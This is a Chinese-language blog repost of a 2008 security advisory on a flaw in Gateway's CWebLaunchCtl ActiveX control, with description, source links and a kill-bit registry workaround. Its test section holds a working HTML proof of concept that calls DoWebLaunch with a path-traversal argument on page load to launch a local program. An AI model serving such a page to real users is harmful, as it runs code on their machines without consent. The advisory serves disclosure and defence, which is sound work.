细水 2008.01.10

漏洞播报

Gateway CWebLaunchCtl ActiveX控件远程栈溢出漏洞

发布日期:2008-01-08
更新日期:2008-01-10

受影响系统:

Gateway weblaunch.ocx 1.0.0.1

描述:


BUGTRAQ  ID: 27193

Gateway是美国一个著名的电脑品牌,产品包括PC、笔记本、外围设备等。

Gateway电脑所带的ActiveX控件实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。

Gateway电脑中所安装的CWebLaunchCtl ActiveX控件(weblaunch.ocx)没有正确地验证对DoWebLaunch()函数的输入,如果用户受骗访问了恶意网页并向该函数传送了超长参数的话,就可能触发栈溢出,导致执行任意指令。

<*来源:Elazar Broad (elazarb@earthlink.net
  
  链接:http://secunia.com/advisories/28379/
        http://www.kb.cert.org/vuls/id/735441
*>

测试方法:


警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
<head>
  <title>Gateway Weblaunch ActiveX Control Insecure Method Exploit</title>
  <script language="JavaScript" defer>
    function Check() {
    
                //escape from systemdrive\documents and settings\username\local settings\temp
        obj.DoWebLaunch("","..\\..\\..\\..\\windows\\system32\\calc.exe","","");
          
    }
  
   </script>
  </head>
<body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:93CEA8A4-6059-4E0B-ADDD-73848153DD5E" height="0" width="0">
     Unable to create object
    </object>
</body>
</html>

建议:


临时解决方法:

* 在IE中禁用CWebLaunchCtl ActiveX控件,为以下CLSID设置kill bit:

{93CEA8A4-6059-4E0B-ADDD-73848153DD5E}

或将以下文本保持为.REG文件并导入:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{93CEA8A4-6059-4E0B-ADDD-73848153DD5E}]
"Compatibility Flags"=dword:00000400

厂商补丁:

Gateway
——-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.gateway.com/


您可以随意转载,但必须在显著位置标明 原创链接 和本 版权声明

本文链接: http://www.mcafeefans.com/?p=2330

发表评论

电子邮件地址不会被公开。

:wink: :twisted: :roll: :mrgreen: 8) :-D :arrow: :-o more »

返回页首返回页尾